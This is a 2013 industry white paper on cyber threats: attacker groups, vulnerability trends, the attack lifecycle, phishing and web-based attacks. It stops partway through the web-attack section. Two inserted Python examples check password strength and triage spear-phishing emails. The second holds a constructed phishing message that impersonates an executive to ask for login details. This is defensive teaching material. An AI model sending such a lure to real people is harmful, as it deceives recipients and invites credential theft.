CYBERSECURITY
COUNTERINTELLIGENCE
RESEARCH, STRATEGY AND TACTICS
WHITE PAPER
Audience CISOs, CIOs, IT Managers, Risk Managers, Business Systems Owners
Author Keith Price, Director and Principal Consultant, Black Swan Group
Date June 2013
Contents
1.0 Executive Summary ... 3
2.0 Why You Will Be Attacked ... 5
3.0 Who The Attackers Are ... 8
    Organised Criminal Groups
    State-Affiliated Groups
    Radical Activists
    Insiders and Employees
4.0 How You Are Vulnerable ... 12
5.0 How You Will be Attacked ... 14
    The Attack Lifecycle
    Malware and Hacking
    External Targeted Attacks
    Phishing
    Web-Based Attacks
    Exploit Kits
    Botnets
    Denial of Service Attacks
6.0 The State of Security Technology Defences ... 25
7.0 Recommendations ... 28
    Security as a Counterintelligence Function
    Break the Cyber Kill Chain
    The Necessity of a Zoned Security Architecture
    Develop a Security Improvement Roadmap
8.0 Conclusion ... 34
9.0 About the Author ... 35
10.0 About Black Swan Group ... 36
11.0 References ... 37
Contact
Keith Price
Director & Principal Consultant
Black Swan Group Australia Pty Ltd
+61-438-138-535
3
After the 1984 IRA bombing at the Grand Hotel in Brighton, England, targeting the British cabinet, the IRA issued a statement saying: “We only have to be lucky once. You will have to be lucky always.”
1.0 Executive Summary
In cyberspace, attackers only have to be lucky once to compromise your
network, while you must be constantly vigilant, never letting your guard down.
Fail just once, and you’re owned. Your entire technology infrastructure –
operating systems, applications, user access credentials, and most importantly,
your information – is all in the attacker’s hands.
Protecting your business assets is challenging. Technology plays a major part,
but is not the whole solution. Cyber threats are evolving faster than the
technologies we can deploy against them, and no organisation can afford to
eliminate all cyber risks - the cost/benefit justifications just aren’t there.
To effectively manage cyber risk, the best response we have today starts with
asking the right questions, researching attackers’ motivations, capabilities, and
methods, identifying our most important assets, understanding where we’re
vulnerable, and being vigilantly aware of our own unique situation.
Our adversaries are highly sophisticated and deeply resourced. Preventing,
detecting and responding to today’s cyberattacks requires organisations to start
viewing information security more like a counterintelligence function.
“Counterintelligence” from over 50 recent security reports and online resources
This white paper provides you with the latest cybersecurity counterintelligence
as a starting point to explore new defensive measures. If there is one source of
counterintelligence you need to read, this is it. This paper incorporates key
findings from 25 recently released threat reports, surveys and databases from
vendors, consultancies, governments and industry associations, and more than
25 other online references. A comprehensive list of threat reports is provided
(see P37) for further reference and in the footnotes throughout.
Recommendations in response to key findings
This paper describes the “cyber kill chain” (see P29), a new model which helps
turn counterintelligence into action. Originally a military concept, the kill chain
refers to the stages of a cyberattack and the critical intervention points in the
chain to respond to an attack. The model enables us to analyse attacks in a
new way and direct resources to where they will have most impact. Break the
kill chain of the attack at any one point and you have thwarted the attacker.
The kill chain model highlights the need for a zoned security architecture that
includes concentric layers of protection. A zoned security architecture (see P31)
provides multiple barriers that the attacker must penetrate one at a time,
dramatically increasing the difficulty of exploitation and giving businesses an
increased opportunity to detect and stop attacks at various stages.
Bearing in mind that the ultimate objective of information security is business
process assurance, security also needs to grow from a collection of disparate
technologies and practices to an effective business process. A prioritised, risk
based “security improvement road map” (see P33) addressing people, process,
technology and organisational controls helps achieve this objective.
For more information about how to manage cybersecurity threats, contact Black
Swan Group for a discussion about how the strategies outlined in this paper may
help protect your organisation.
4
CYBER THREATS IN A BUSINESS CONTEXT
The diagram below illustrates how cyber threats fit in the context of your
business. Cyber threats arise through your business’s operating requirements.
Threat agents attempt to exploit vulnerabilities and compromise business
assets, and countermeasures must be put in place to defend against them.
Business asset owners need to be confident that the countermeasures are
adequate to protect against threats to assets. This paper provides the latest
research and thinking about threat agents, attack methods, vulnerabilities and
countermeasures to help business asset owners evaluate risks and protection
strategies. It should support your own knowledge about your business’s needs,
risks and the value of your assets.
[Figure 1 diagram: relationships among Business Needs, Threat Agents, Threats, Vulnerabilities, Risk, Assets, Countermeasures and Business Asset Owners (give rise to, exploit, reduce, are reduced by, impose, are concerned with), with a continuous improvement process looping back to Business Needs.]
Figure 1: Business Needs, Threats, Vulnerabilities, and Countermeasures
(Source: Keith Price based on ISO/IEC 15408-1)
5
2.0 Why You Will Be Attacked
A recent survey released by CERT Australia [1] found that over 1 in 5 organisations
experienced a cyber incident in the previous 12 months. It further found that
50% of organisations considered attacks on their organisation to be targeted.
This indicates a shift from previous views or conceptions, that most attacks are
non-targeted or indiscriminate. And while the majority of attacks were reported
to come from external sources, the fact that 44% originated from within
organisations serves as a reminder that internally-focused cyber security
controls and measures are important.
Of the Australian organisations that experienced cyber incidents, 17% suffered
from loss of confidential or proprietary information, 16% encountered a denial-
of-service attack, and 10% financial fraud.
The findings are revealing because they indicate that 17% of the organisations
had their information compromised despite having the following people,
processes, and technologies in place:
- Over 90% of respondents deployed firewalls, anti-spam filters and anti-virus software
- 66% had documented incident management plans
- About 60% of organisations used IT security related standards
- About 65% of organisations had staff with tertiary level IT security qualifications
- Over 50% had staff with vendor IT security certifications
The following graph shows that the volume of malware infections on average
during this financial year was about 16,500 malware reports each day –
representing what the Australian Internet Security Initiative (AISI) [2] says is a
"significant level of malware" affecting Australians. These malware infections
were reported daily to about 130 ISPs and other network operators through the
AISI network.
1 Cyber Crime & Security Survey Report, 2012, https://www.cert.gov.au/
2 http://www.acma.gov.au/Industry/Internet/e-Security/Australian-Internet-Security-Initiative
“There are two types of companies: those that have been hacked and those that will be hacked.” Robert Mueller, FBI Director, speaking at the 2012 RSA Conference.
6
Figure 2: Daily Count of Australian IP Addresses Identified as Having Malware-infected Devices Behind Them
Source: Australian Communications and Media Authority
The majority of cyberattacks by far occur in the United States, but Australia,
India, and the Netherlands are tied for third at 3%. [IBM]
Figure 3: Security Incidents by Country, 2012
Source: IBM X-Force Trend & Risk Report 2012
The general trend today is a greater overall number of breaches involving
different kinds of assets. Information is being stolen and sold online in
unprecedented levels and professionally written malicious code is behind most
of this data theft.
Cybercriminals favour payment and personal information that can easily be
converted into cash. Spy types prefer trade secrets (eg schematics and
formulas), internal organisational data (eg e-mails and reports), and system
information. Hacktivists like the titillating aspect of personal information and
internal organisational data. Credentials are fun for the whole family. [Verizon]
7
The following figure indicates the types of data that were compromised or
breached in the past 12 months:
Figure 4: Types of Data Compromised
Source: The State Of Data Security And Privacy: 2012 To 2013, Forrester
IBM declared 2011 the “Year of the Security Breach” because it had the highest
number of recorded data loss incidents to date. [3] In 2012, there were 1,502
documented incidents, a rise of nearly 40%. [IBM] The 2012 data makes it clear that
any business, no matter its size, was a potential target for attackers. In fact,
50% of all targeted attacks were aimed at businesses with fewer than 2,500
employees. And 35% of all targeted attacks are targeted at companies with
fewer than 500 employees. [Sym_Supp]
For Australia this is significant because the vast majority (96%) of Australian
businesses are small businesses. [4] Many small businesses assume that they
have nothing an attacker or hacktivist would want to steal. But most every
company regardless of size has money in the bank, some customer or business
partner information, and, for others, proprietary information. Certainly the
rewards of attacking a large enterprise are more significant than that of a
smaller company however smaller companies just don’t have the funds or
skilled staff so they make for easier targets.
Governments too are targets. The U.S. government’s National Security Agency
(NSA) works under the assumption that they have been compromised. Deborah
Plunkett, who heads the NSA's Information Assurance Directorate says “There’s
no such thing as ‘secure’ any more. The most sophisticated adversaries are
going to go unnoticed on our networks. We have to build our systems on the
assumption that adversaries will get in. We have to…assume that all the
components of our system are not safe, and make sure we’re adjusting
accordingly”. [5]
3 https://www-950.ibm.com/events/wwe/grp/grp004.nsf/vLookupPDFs/IBM%20X-Force%202012%20Cyber%20Security%20Threat%20Landscape/$file/IBM%20X-Force%202012%20Cyber%20Security%20Threat%20Landscape.pdf
4 http://www.abs.gov.au/ausstats/abs@.nsf/Latestproducts/8165.0Media%20Release1Jun%202007%20to%20Jun%202011?opendocument&tabname=Summary&prodno=8165.0&issue=Jun%202007%20to%20Jun%202011&num=&view=
5 http://www.reuters.com/article/2010/12/16/us-cyber-usa-nsa-idUSTRE6BF6BZ20101216
8
3.0 Who The Attackers Are
Attackers’ actions can be malicious or non-malicious, intentional or
unintentional, causal or contributory. Identifying actors is critical to immediate
corrective actions and longer-term defensive strategies. [Verizon]
There are four general attack groups:
- Organised criminal groups
- State-affiliated groups
- Radical activists
- Insiders
ORGANISED CRIMINAL GROUPS
Criminal gangs in Eastern Europe have historically dominated financially
motivated attacks. Their preferred method is to compromise a card processing
vendor or transaction clearing centre to get access to the card data. Other
methods also include fake electronic funds transfers (EFTs) and secret premium-
rate SMS messages on smartphones.
More than half of all external breaches are tied to organised criminal groups.
This reflects the high prevalence of illicit activities associated with threat actors
of this ilk, such as spamming, scamming, payment fraud, account takeovers,
identity theft, etc. For professional criminals, the “why” is simple and consistent
- money. Most attacks originate either in the U.S. or Eastern European countries
(eg Romania, Bulgaria, and the Russian Federation). Payment cards have been
a lock as the most oft-stolen data type. [Verizon]
STATE-AFFILIATED GROUPS
State-affiliated groups seek data that furthers national interests, such as military
or classified information, economy-boosting plans, insider information or trade
secrets, and technical resources such as source code. They will generally not
target payment systems and information. Phishing-malware-hacking-entrenchment
is the staple of espionage campaigns. [Verizon] See page 18 for more
about phishing.
96% of espionage cases were attributed to threat actors in China. [Verizon] China
once again overwhelmingly remained the source of the largest volume of attack
traffic as well, accounting for 40% of the total, up from a third in the prior
quarter. [AKAMAI]
When Mandiant first published details about the Advanced Persistent Threats
(APT) in their 2010 M-Trends report, they stated that “The Chinese government
may authorize this activity, but there’s no way to determine the extent of its
involvement.” Now, three years later, Mandiant’s 2013 report states they have
analysed new evidence from hundreds of investigations to conclude that the
groups conducting these APT activities are based primarily in China and that the
Chinese Government is aware of them. [Mandiant]
Organisations in all industries related to China’s strategic priorities are potential
targets for APTs’ comprehensive cyber espionage campaign. The following
figure indicates the industries compromised by cyberattacks:
The enemy invariably attacks on two occasions: a. When they're ready. b. When you're not. (Canonical Murphy's Laws of Combat)
9
Figure 5: Industries Compromised by Cyberattacks
Source: Mandiant APT1 Report, March 2013
RADICAL ACTIVISTS
Another name for radical activists is hacktivists. Hacktivism exploded in 2012,
and became the number one cyber outlet of choice for the public expression of
controversial opinions – political and economic – as well as a means for
protesting ideological conflicts. Today’s hacktivist groups predominantly are
non-related teams (or individual hackers) who attack entities – alleged “culprits”
– according to the attackers’ own political, religious, social or economic
agendas. [RSA] Anonymous is the largest and most well-known hacktivist group. [6]
The proportion of incidents involving activist groups has been consistent over
the past year or so but the amount of data they stole this year is down
substantially from 2011. Much of the activity claimed by hacktivists in 2012
shifted primarily to denial of service (DoS) attacks. [Verizon] See page 23 for more
about DoS attacks.
INSIDERS AND EMPLOYEES
Findings from a PwC global survey of 12,052 senior executives identified current
and former employees as the greatest source of risk to their organisations, as
indicated in the following figure.
6 For more information, visit: http://www.informationweek.com/security/attacks/who-is-anonymous-10-key-facts/232600322?pgno=1
10
Figure 6: Estimated Likely Source of Incidents
Source: Key findings from the PWC Global State of Information Security Survey
A 2012 IBM/Ponemon study of 265 C-level executives reinforced this finding,
with 43% of respondents saying that negligent insiders were the number one
greatest risk to sensitive data. [PONEMON]
Contributing to risks, in 91% of organisations, users were found to be using
applications with a potential to bypass security, hide identities, cause data
leakage or even introduce a malware infection without their knowledge. [CHECK POINT]
Weak and default passwords continue to be a notable risk. Unbelievably, the
most common passwords for 2012 were still “Welcome1” and “Password1”.
These two passwords, based on the requirements of Active Directory, are no
different than the password “J*1maw)2” even though one password is obviously
far harder to guess than the other. This is the result of Active Directory
examining the password as a whole to determine whether it follows the rules
instead of comparing it to dictionary words or slight variations like Linux does.
Passwords once thought to be complex enough to make cracking improbable
are now able to be reversed in hours or days. This requires users and
administrators to rethink how they create passwords and how users are
educated about password security. A passphrase is also easier to remember
and doesn’t need to be written down. Not only do long passphrases make brute
force attacks impractical for an attacker, they also combat rainbow table-based
attacks given their large disk space requirements. [Trustwave]
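The Active Directory point above, as an added example that is not part of the paper: a Python check contrasting an approximation of the AD complexity rule, which judges the string as a whole, with a dictionary-and-variant check of the kind the passage attributes to Linux, plus a long-passphrase alternative. The wordlist, account name and sample passwords are constructed for the demonstration.

```python
import re

# Constructed mini wordlist for the demonstration; a real audit would load a
# full dictionary or cracked-password corpus instead.
DICTIONARY = {"welcome", "password", "summer", "company", "admin", "letmein"}

# Common "leet" substitutions that wordlist rules undo before comparing.
LEET_MAP = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                          "5": "s", "7": "t", "@": "a", "$": "s", "!": "i"})


def ad_complexity_ok(password: str, account_name: str = "", min_length: int = 8) -> bool:
    """Approximation of the Windows/Active Directory 'Password must meet
    complexity requirements' policy: minimum length, at least three of the four
    character classes, and no occurrence of the account name. It looks at the
    string as a whole, so 'Welcome1' and 'J*1maw)2' are judged identically."""
    if len(password) < min_length:
        return False
    if len(account_name) >= 3 and account_name.lower() in password.lower():
        return False
    classes = [
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    ]
    return sum(classes) >= 3


def candidate_base_words(password: str):
    """Yield the normalised forms a cracker's mangling rules would also try:
    lowercased, leet-decoded, and with leading/trailing digits or symbols
    stripped (the 'Welcome1' -> 'welcome' case)."""
    lowered = password.lower()
    yield lowered
    yield lowered.translate(LEET_MAP)
    stripped = re.sub(r"^[^a-z]+|[^a-z]+$", "", lowered)
    yield stripped
    yield stripped.translate(LEET_MAP)
    yield re.sub(r"^[^a-z]+|[^a-z]+$", "", lowered.translate(LEET_MAP))


def dictionary_variant_ok(password: str, dictionary=DICTIONARY) -> bool:
    """Reject a password that is a dictionary word or a slight variation of
    one (case change, leet substitution, appended digits/symbols)."""
    return not any(base in dictionary for base in candidate_base_words(password))


def policy_ok(password: str, account_name: str = "", passphrase_length: int = 20) -> bool:
    """Combined rule: accept AD-style complexity OR a long passphrase, but
    always reject dictionary words and their variants. A fuller check would
    also test each word of a passphrase; this one tests the whole string."""
    long_enough = len(password) >= passphrase_length
    return (ad_complexity_ok(password, account_name) or long_enough) \
        and dictionary_variant_ok(password)


def assess(password: str, account_name: str = "") -> dict:
    """Report how the two rule styles judge one password."""
    return {
        "ad_complexity": ad_complexity_ok(password, account_name),
        "not_dictionary_variant": dictionary_variant_ok(password),
    }


if __name__ == "__main__":
    # Constructed samples: the two passwords named in the text, the random
    # one it contrasts them with, a leet variant, and a passphrase.
    for pw in ("Welcome1", "Password1", "J*1maw)2", "P@ssw0rd!",
               "correct horse battery staple"):
        print(f"{pw!r:32} {assess(pw)}  policy_ok={policy_ok(pw)}")
```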
11
In summary, the following table lists threat agents and their preferred methods of attack:
Figure 7: Threat Agents and Exploits
Source: ENISA Threat Landscape Report, January 2013
12
4.0 How You Are Vulnerable
Well known vulnerabilities [7] are key targets for hackers who rely on the simple
fact that many organisations do not update their software on a regular basis.
The bigger the organisation, the harder it is for security administrators to keep
all systems fully updated.
In 2012, IBM saw 8,168 publicly disclosed vulnerabilities, an increase of 14%
over 2011. [IBM] No IT administrator is going to be able to manually keep constant
track of the patch state of all the programs on all computers in their system.
Vulnerabilities in software will continue to be a major risk factor, increasing the
importance of patch management in the critical path to security.
The following figure shows the top 10 vendors by vulnerability disclosures in
2012. Compared to the average numbers of the preceding 10 years, only one of
these 10 vendors (Microsoft) managed to decrease the number of vulnerability
disclosures in its products in 2012. All other vendors increased their
vulnerability numbers in 2012. [NSS_1]
Figure 8: Top 10 vendors by vulnerability disclosures
Source: NSS Labs Vulnerability Threat Trends 2013
Web applications are still topping the chart of most disclosed vulnerabilities,
rising 14% in 2012 over the 2011 end of year numbers. Cross-site scripting
(XSS) dominated the web vulnerability disclosures at 53% of all publicly released
vulnerabilities. Although SQL injection attack methods remain as a top attack
technique, the actual disclosures of new SQL injection vulnerabilities remain
lower than the 2010 peak IBM recorded. [IBM]
7 For more information on vulnerabilities, visit the U.S. National Vulnerability Database site at http://nvd.nist.gov/
13
The following figure shows web applications vulnerabilities by attack technique:
Figure 9: Web Application Vulnerabilities by Attack Technique, 2006 to 2012
Source: IBM X-Force Trend & Risk Report 2012
The complexity to execute a successful attack is an important factor to assess
the risk of a vulnerability. A highly critical vulnerability that can only be exploited
under very specific circumstances might require less immediate attention than a
less critical vulnerability for which automated exploitation functionality is easily
available in crimeware or penetration testing kits. [NSS_1]
The figure below illustrates that the share of low complexity vulnerabilities – the
easiest to exploit – repeatedly decreased from a high on over 90% early in the
century to 48%, or a total of 2,534 in 2012.
Figure 10: Complexity Required to Successfully Exploit a Vulnerability (lower complexity = greater risk)
Source: NSS Labs Vulnerability Threat Trends 2013
In the same period, medium complexity vulnerabilities increased their share
from below 5% to 47%, or 2,431, in 2012. Disclosures of high complexity
vulnerabilities have been mostly stable in the last decade at an average share of
4%. This data documents a clear (but slowing) trend towards an increase in
attack complexity. Vulnerabilities with a high criticality paired with low attack
complexity pose a clear and present threat to the user of the affected software.
A considerable 484, or 9.2%, of the vulnerabilities disclosed in 2012 had a
CVSS [8] base score of 9.9 or more paired with a low attack complexity. [NSS_1]
8 See www.first.org/cvss
14
5.0 How You Will be Attacked
The Internet connects criminals to a virtually limitless host of potential victims.
It is boundaryless in that cybercriminals can sit at their computers in one
country and attack a person or company in another country.
Cybercriminals have been successful for six primary reasons:
- The basic protocol of the Internet – TCP/IP – is inherently insecure and was not designed with security in mind
- There are over a billion people who use the Internet and each one can be a potential victim
- The sheer number of machines with unpatched operating systems and applications creates a massive array of potential targets to compromise with the latest malware
- Software programmers have not historically considered security as a primary part of their software design, leaving a treasure chest of vulnerabilities that cybercriminals exploit
- The Internet is an open network of networks with no central police or regulatory authority
- Attackers can cover their tracks by spoofing IP addresses, compromising legitimate servers from which to launch attacks, and deleting log files
The Internet enables many hacking methods to be highly scalable, automated, targeted, and conducive to anonymity. [AKAMAI]
The rise of ecommerce, increased network connectivity with business partners
and employees, the complexities of bespoke applications and legacy systems,
and the increasing threat from nation-states, cybercriminals and hacktivists
make cyber black swan events [9] inevitable.
Hackers’ techniques are constantly changing, using more advanced and
sophisticated attack methods, raising the security challenge year after year.
Attack trends in 2012 took advantage of well publicised legacy issues such as
password security, ineffectual security controls, and legacy devices, protocols
and attacks. What is different about today is the attacker’s “own the
environment” nature of attacks.
There are multiple entry points to breach an organisation’s defences: malicious
attachments, browser-based vulnerabilities, removable media, mobile devices,
etc. The initial point of entry is rarely the ultimate target; additional
reconnaissance and lateral movement are needed to identify the location of
valuable data (commonly called “establishing a beachhead”). Once a
beachhead is formed, attackers conduct network scanning to determine what
other systems are either on the same network segment or communicating with
the compromised host. This information is then used to move laterally and
penetrate deeper into the target’s infrastructure and find valuable data. [Trustwave]
9 In his book The Black Swan, IMF advisor Nassim Taleb describes a ‘black swan event’ as having three attributes: rarity, extreme impact and
retrospective predictability.
15
THE ATTACK LIFECYCLE
Cyberattackers typically operate in a few broadly defined steps as indicated in the following attack lifecycle:
Figure 11: Attack Lifecycle
Source: E&Y/ISACA Responding to Targeted Cyberattacks Report, 2013
Lifecycle Step: Objective

Conduct background research: Detailed research on targets to identify targeted avenues of attack.
Execute initial attack: The initial attack targets one or more specific individuals through some form of social engineering.
Establish foothold: Establish an initial foothold into the target environment using some version of customised malicious software.
Enable persistence: Establish persistent command and control over compromised computers in the target environment.
Conduct enterprise reconnaissance: Find the computers, servers or storage areas holding the information the attackers have been instructed to steal.
Move laterally to new systems: Understand to what new parts of the enterprise the attacker might gain access from the new systems. Also install command-and-control software on new systems to expand persistent access to the environment.
Escalate privileges: Escalate from local user to local administrator to higher levels of privilege so that the attacker is not constrained to any specific part of the environment.
Gather and encrypt data of interest: Gather captured data into an archive and then compress and encrypt it to hide from technologies such as deep packet inspection and from data loss prevention (DLP) at the enterprise boundary.
Exfiltrate data from victim systems: Use HTTP, HTTPS, FTP or custom data transfer technologies operating on standard and nonstandard ports.
Maintain persistent presence: Maintain long-term access to the target environment.
Table 1: Attack Lifecycle Steps and Objectives
Source: E&Y/ISACA Responding to Targeted Cyberattacks Report, 2013
16
MALWARE AND HACKING
Malware and hacking still rank as the most common attack methods, but they
scaled back rather significantly among 2012 breaches. Direct installation of
malware by an attacker who has gained access to a system is again the most
common vector. [Verizon]
Attackers use various techniques referred to as attack vectors. The following
figure lists some of these attack vectors, according to the percentage of
organisations that suffered from them. Memory Corruption, Buffer Overflow and
Denial of Service are the most popular attack vectors found in Check Point’s
research. [Check Point]
Figure 12: Top Attack Vectors
Source: Check Point Security Report 2013
75% of the malware files reported to Sophos are only ever seen in one
organisation. This level of polymorphism is unprecedented. What’s more,
attackers have begun to develop and use far more sophisticated approaches to
polymorphism to hide their attacks from security vendors and IT
organisations. [Sophos]
In 2012 more than 80% of the threats Sophos saw were redirects, mostly from
legitimate sites that have been hacked. A powerful warning to keep your site
secure and your server scripts and applications up to date. [Sophos]
Client-side attacks—both targeted and en masse—are also on the rise. These are
perpetrated by both Web-based systems and email, two vectors that are most
used but in many cases least protected. [Trustwave]
17
The vast majority of attacks are opportunistic. Opportunistic attacks are those
where the victim isn’t specifically chosen as a target; they were identified and
attacked because they exhibited a weakness the attacker knew how to exploit.
It’s notable that the majority of breaches result from simpler opportunistic
attacks than from money-hungry organised criminal groups. [Verizon]
EXTERNAL TARGETED ATTACKS
While the majority of cyberattacks are opportunistic, targeted attacks can be the
most dangerous. A targeted attack occurs when attackers target a specific
organisation over a long time span. Often the objective of targeted attacks is
either data exfiltration or gaining persistent access and control of the target
system. These attacks need time (in some cases a few years) to be detected
and are rather hard to avoid.
Targeted attacks are commonly used for the purposes of hacktivism and
industrial espionage to gain access to the confidential information on a
compromised computer system or network. They are rare but potentially the
most difficult attacks to defend against. Targeted attacks combine social
engineering and malware to target individuals in specific companies with the
objective of stealing confidential information such as trade secrets or customer
data. They often use custom-written malware and sometimes exploit zero-day
vulnerabilities, which makes them harder to detect and potentially more
infectious.
Targeted attacks use a variety of vectors as their main delivery mechanism, such
as malware delivered in an email, or drive-by downloads from an infected
website the intended recipient is known to frequent, a technique known as a
“watering hole” attack. [Sym]
Over the past year, we’ve seen a significant rise in the volume of external
attacks as indicated in the following figure:
Figure 13: Change in the Risk Environment during 2012
Source: Ernst & Young’s 2012 Global Information Security Survey
In 2009, 41% of respondents noticed an increase in external attacks. By 2011,
that number had leapt to 72%. In 2012, the number of respondents indicating
an increase in external threats has risen again to 77%. [E&Y]
In terms of cyber security incidents, more than half of Australian organisations
surveyed considered attacks on their organisation to be targeted. This indicates
a shift (in an Australian context) from previous views or conceptions, that most
18
attacks are non-targeted or indiscriminate. And while the majority of attacks
were reported to come from external sources, the fact that 44% originated from
within organisations serves as a reminder that internally-focused cyber security
controls and measures are also important. [CERT_AU]
PHISHING
Phishing refers to hoax e-mail messages that look like they are from your bank,
another financial institution or business, that ask you to visit a fraudulent
website that looks like the bank’s or other financial institution or business, in
order to confirm account information including usernames and passwords. [10]
From 2010 to 2012, the email scam/phishing volume nearly quadrupled,
reaching more than 83% of the 2008 levels in spring 2012. [IBM] In February
2012, the number of unique phishing sites recorded by APWG reached an all-
time high of 56,859 which indicates this criminal activity is not decreasing.
While the overall number of targeted institutions has dropped, phishers continue
to target larger or more popular targets. [Anti]
Phishing attacks are often through emails containing an infected PDF, Word, or
Excel document to a targeted individual known within an organisation. This is
called “spear phishing” or “whaling” when directed specifically at senior
executives and other high profile targets.
Phishers use various social engineering techniques to lure their victims into
clicking on an infected attachment, a link to a malicious website, or providing
information such as passwords or personal details. When opened, the PDF,
Word, or Excel document triggers a previously unknown or zero-day exploit to
compromise the machine. The attacker can then use this foothold to get deeper
into the network and complete the breach. [Verizon]
A successful phishing campaign requires a series of “and” statements for every
step in a campaign. With each added step, the probability of a system
compromise goes down. For example, a user needs to take action AND there
needs to be a vulnerability on the system AND software has to be quietly
installed AND there has to be a communication path back to the attacker, and,
and, and: this is why we have the term “defence in depth”. [Verizon]
There are four general approaches to targeted attacks through phishing emails: (Trustwave)
- Social engineering: Common email themes are conferences, internal communications, employee reviews, surveys, meeting invitations and security updates.
- Context: The email makes sense to an employee of that organisation.
- Homework: Attackers do their research, collect employee email addresses, and the “From” field is changed so it appears to come from someone known to the organisation.
- Attachments/links: There is typically a malicious attachment (.doc, .xls, .pdf) that contains exploit code. Executable file attachments and links are also used.
[10] http://www.protectfinancialid.org.au/default.aspx?ArticleID=16#phishing
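A defender-side triage of the four traits just listed, as an added example that is not code from the white paper or from Trustwave: it parses a message with Python’s standard email module and flags a known insider’s display name on an external address (the “Homework” trait), a lookalike sender domain, a Reply-To that steers replies to a third domain, and the attachment types the paper names. The internal domain, the watched display names and both sample messages are constructed for the example.

```python
"""Triage an inbound message for the spear-phishing traits listed above.

Added example, not code from the white paper or from Trustwave. The
internal domain, the impersonated display names and both sample messages
are constructed for illustration.
"""
import email
import re
from email import policy
from email.utils import parseaddr

INTERNAL_DOMAIN = "example.com.au"                     # assumed
IMPERSONATED_NAMES = {"jane ceo", "accounts payable"}  # display names to watch (assumed)
RISKY_EXTENSIONS = (".doc", ".xls", ".pdf", ".exe", ".scr", ".js")

# Constructed phishing sample: an executive's name on a lookalike domain,
# a Reply-To steering replies elsewhere, and a Word attachment.
PHISH_EML = b"""\
From: "Jane CEO" <jane.ceo@example-com-au.net>
Reply-To: updates@mail-review.invalid
To: staff@example.com.au
Subject: Q2 employee review - action required
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please open the attached review and confirm your login details.
--b1
Content-Type: application/msword; name="review.doc"
Content-Disposition: attachment; filename="review.doc"
Content-Transfer-Encoding: base64

ZHVtbXk=
--b1--
"""

# Constructed benign sample from the real executive, no attachment.
BENIGN_EML = b"""\
From: "Jane CEO" <jane.ceo@example.com.au>
To: staff@example.com.au
Subject: Town hall on Thursday

See you at 10.
"""

def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""

def _squash(domain: str) -> str:
    """Strip separators so example-com-au.net and example.com.au compare alike."""
    return re.sub(r"[^a-z0-9]", "", domain)

def triage(raw: bytes) -> dict:
    """Return the sender address, the traits found and a simple score."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    name, addr = parseaddr(msg.get("From", ""))
    from_dom = _domain(addr)
    external = from_dom != INTERNAL_DOMAIN
    # "Homework": a known insider's display name on an external address.
    if external and name.lower() in IMPERSONATED_NAMES:
        findings.append("display-name-impersonation")
    # Lookalike domain: our domain's letters embedded in the sender's domain.
    if external and _squash(INTERNAL_DOMAIN) in _squash(from_dom):
        findings.append("lookalike-domain")
    # A Reply-To on a third domain diverts any reply to the attacker.
    _, reply = parseaddr(msg.get("Reply-To", ""))
    if reply and _domain(reply) not in (from_dom, INTERNAL_DOMAIN):
        findings.append("reply-to-mismatch")
    # Attachments/links: the document types the paper names, plus executables.
    for part in msg.iter_attachments():
        filename = (part.get_filename() or "").lower()
        if filename.endswith(RISKY_EXTENSIONS):
            findings.append("risky-attachment:" + filename)
    return {"from": addr, "findings": findings, "score": len(findings)}

if __name__ == "__main__":
    for label, raw in (("phish", PHISH_EML), ("benign", BENIGN_EML)):
        print(label, triage(raw))
```

The score is only a count of traits; a mail gateway would combine it with sender authentication results (SPF/DKIM) and quarantine rather than block on the count alone.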
As indicated in the following diagram, in 2012 the most frequently targeted job role for phishing was in R&D, which accounted for 27% of attacks (9% in 2011). The second most notable increase was against sales representatives, probably because their contact details are more widely available in the public domain, with 24% of attacks in 2012 versus 12% in 2011. In 2011, C-level executives were the most targeted, with 25%, but this number fell to 17% in 2012. (Sym)
Figure 14: Targeted Attack Recipients by Role, 2012
Source: Symantec Internet Security Threat Report, Volume 18, 2013
Executives and managers make sweet targets for criminals looking to gain access to sensitive information via spear phishing campaigns. Not only do they have a higher public profile than the average end user, they’re also likely to have greater access to proprietary information. Plus, we all know how much they love .ppt and .pdf attachments. (Verizon)
WEB-BASED ATTACKS
Web browsers are the most used programs to access the Internet from desktops, laptops, tablets and mobile devices. Web browser vulnerabilities are a serious security concern due to their role in online fraud and in the propagation of malicious code, spyware and adware. In addition, web browsers are exposed to a greater amount of potentially untrusted or hostile content than most other applications and are particularly targeted by multi-exploit attack kits. (Sym_Supp)
The following figure shows web browser usage over the past 12 years, with Google’s Chrome skyrocketing to the top spot:
Figure 15: Web Browser Usage
Source: NSS Labs Vulnerability Threat Trends 2013
Overall web browser vulnerabilities declined slightly for 2012. While the overall number of web browser vulnerabilities dropped by a nominal 6% from 2011, the number of critical and high severity web browser vulnerabilities saw an increase of 59% for the year. (IBM) The following figure represents the increasing number of critical and high web browser vulnerabilities over the years:
Figure 16: Web Browser Vulnerabilities, Critical and High 2005 to 2012
Source: IBM X-Force Trend & Risk Report 2012
Expanding on functionality beyond just the browser, a web client is much more: it is a full-blown platform, with infrastructure, utilities and extensibility via plug-ins. This extensibility is where most of the exposure lies, as malware authors disguise exploit kits as browser plug-ins. For years, malware authors have been obfuscating their code to avoid AV signature detection, and this process is now automated (polymorphic JavaScript obfuscators are common in exploit kits, for example). With the shift from HTML/JavaScript-centric browser attacks to browser plug-in attacks, it was only a matter of time before malware authors would adopt the same techniques. This means exploits written in Java and ActionScript (the programming language used in Flash) now use automated obfuscation tools to avoid AV signature detection. (Trustwave)
The ever expanding sophistication of malware and the increasing number of vulnerabilities make the web the most formidable malware delivery mechanism we’ve seen to date, outpacing even the most prolific worm or virus in its ability to reach and infect a mass audience silently and effectively. (Cisco)
Web malware encounters occur everywhere people visit on the Internet, including the most legitimate of websites that they visit frequently, even for business purposes. Business and industry sites are one of the top three categories visited when a malware encounter occurred. Malicious scripts and iFrames comprised 83% of encounters in 2012, relatively consistent with previous years. These types of attacks often represent malicious code on “trusted” webpages that users may visit every day, meaning an attacker is able to compromise users without even raising their suspicion. (Cisco)
